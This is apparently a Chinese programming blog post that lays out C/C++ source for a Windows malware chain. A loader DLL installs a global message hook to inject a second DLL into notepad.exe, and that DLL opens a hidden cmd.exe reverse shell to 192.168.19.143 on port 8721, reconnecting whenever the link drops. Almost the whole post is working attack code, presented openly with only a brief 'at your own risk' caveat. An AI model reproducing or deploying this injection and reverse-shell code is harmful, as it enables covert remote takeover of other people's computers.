主程序调用loader.dll,运行loader.dll中的sethook安装一个WH_GETMESSAGE的全局钩子,发现notepad进程时,loader.dll在钩子函数中加载Insert.dll,insert.dll会做坏事...
下面仅是一些关键代码,不能运行 后果自负...
1. 主程序代码:
初始化时:
// TODO: 在此添加额外的初始化代码
h_Dll = LoadLibrary("loader.dll");
if (h_Dll == NULL)
{
MessageBox("loadlibrary loader.dll error");
return FALSE;
}
执行loader.dll中的sethook函数:
typedef void (*LOAD)(HWND);
LOAD Proc = (LOAD)GetProcAddress(h_Dll, "?SetHook@@YAXPAUHWND__@@@Z");//获得导出函数
if (Proc == 0)
{
MessageBox("Get proc failed");
return;
}
Proc(m_hWnd);//执行导出函数
主程序退出时,卸载钩子:
typedef void(*UNLOAD)(void);
UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll, "?UnHook@@YAXXZ");
if (Proc == 0)
{
MessageBox("getproc unhook faild");
return;
}
Proc();
FreeLibrary(h_Dll);
2. loader.dll
//安装钩子时的回调函数
LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam, LPARAM lParam)
{
//先向下传递消息
CallNextHookEx(hHook,code,wParam,lParam);
//用于防止重复调用
static bool old = false;
//获得当前进程的绝对路径
char buffer[1000];
memset(buffer,0,1000);
GetModuleFileName(NULL,buffer,1000);
//如果当前路径中包含要查找的进程名
char *InsertName = _strupr(_strdup("notepad.exe"));
char *CurrentName = _strupr(_strdup(buffer));
if (strstr(CurrentName, InsertName) != NULL && old == false)
{
//防止二次加载
old = true;
HMODULE hDll = NULL;
hDll = LoadLibrary("c:\\temp\\aa\\Insert.dll");
MessageBox(NULL,"loader.dll after loadlibrary","ddd",MB_OK);
if (hDll == NULL)
{
MessageBox(NULL, "loadlibrary Insert.dll failed","title",MB_OK);
return FALSE;
}
//获得实际工作的dll的启动函数
MessageBox(NULL,"aaaa","ddd",MB_OK);
RUN Run = (RUN)GetProcAddress(hDll, "?Run@@YAXPAUHWND__@@@Z");//?Run@@YAXPAUHWND__@@@Z
Run(m_hWnd);
}
return TRUE;
}
//导出函数:安装钩子
LOADER_API void SetHook(HWND hWnd)
{
hHook = NULL;
m_hWnd = hWnd;
hHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, hinst,0);
if (hHook == 0)
{
MessageBox(NULL, "setwindowshookEx failed","title",MB_OK);
return;
}
}
//导出函数:卸载钩子
LOADER_API void UnHook()
{
BOOL bRet = UnhookWindowsHookEx(hHook);
if (bRet != TRUE)
{
MessageBox(NULL,"UnhookWindowsHookEx failed","title",MB_OK);
}
}
3.insert.dll
//工作线程
DWORD WINAPI ThreadProc(LPVOID lParam)
{
MessageBox(NULL,"INSERT.DLL threadProc function..","adf",MB_OK);
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
PROCESS_INFORMATION pi;
STARTUPINFO si;
sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&pi,0,sizeof(pi));
memset(&si,0,sizeof(si));
addr.sin_family = AF_INET;
addr.sin_port = htons(8721);
addr.sin_addr.S_un.S_addr = inet_addr("192.168.19.143");
sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
MessageBox(NULL,"INSERT.DLL 断开重连前","adf",MB_OK);
//断开后一直重连
while (1)
{
MessageBox(NULL,"INSERT.DLL while.....","adf",MB_OK);
sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
while (0 != connect(sock, (sockaddr*)&addr, sizeof(addr)))
{
shutdown(sock, 0);
Sleep(5000);
}
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW;
si.hStdInput = si.hStdOutput = si.hStdError = (void*)sock;
si.wShowWindow = SW_HIDE;
memset(&pi, 0, sizeof(pi));
BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true, 0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
closesocket(sock);
}
WSACleanup();
return 1;
}
//导出函数
INSERT_API void Run(HWND hWnd)
{
MessageBox(NULL,"INSERT.DLL run function..","adf",MB_OK);
hThread = NULL;
//loader.dll中的句柄会传过来,给它发一个wm_close
::SendMessageA(hWnd, WM_CLOSE,0, 0);
hThread = CreateThread(NULL, 0, ThreadProc, NULL,0, NULL);
if (0 == hThread)
{
MessageBox(NULL, "createthread failed","failed",MB_OK);
return;
}
}